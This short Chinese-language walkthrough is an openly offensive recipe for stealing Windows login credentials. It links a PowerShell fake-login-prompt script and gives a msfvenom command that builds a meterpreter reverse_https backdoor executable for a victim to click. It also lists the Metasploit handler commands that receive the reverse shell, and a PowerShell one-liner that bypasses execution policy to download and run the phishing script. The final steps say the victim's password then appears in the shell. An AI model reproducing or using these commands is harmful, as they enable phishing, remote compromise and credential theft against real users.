1.powershell网络钓鱼脚本:
https://raw.githubusercontent.com/enigma0x3/Invoke-LoginPrompt/master/Invoke-LoginPrompt.ps1
2.MSF下生产一个后门文件,通过上传或者其他方式让其受害者点击
Msfvenom -p windows/meterpreter/reverse_https
lhost = 192.168.1.138 lport = 4444 -f exe> /opt/bk.exe
2.通过MSF获取远程目标受害者主机的反弹shhell:
msf> use multi/handler
msf exploit(handler )> set payload windows/meterpreter/reverse_https
msf exploit(handler )> set lhost 192.168.1.138
msf exploit(handler )> set lport 4444
msf exploit(handler )> exploit
3.powershel远程下载并执行:
powershell.exe -ep bypass -c IEX ((New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/enigma0x3/Invoke-LoginPrompt/master/Invoke-LoginPrompt.ps1
’)); Invoke-LoginPrompt
4.目标受害者远程登录:
5.一旦成功登录,即可在msf反弹shell中看到密码:
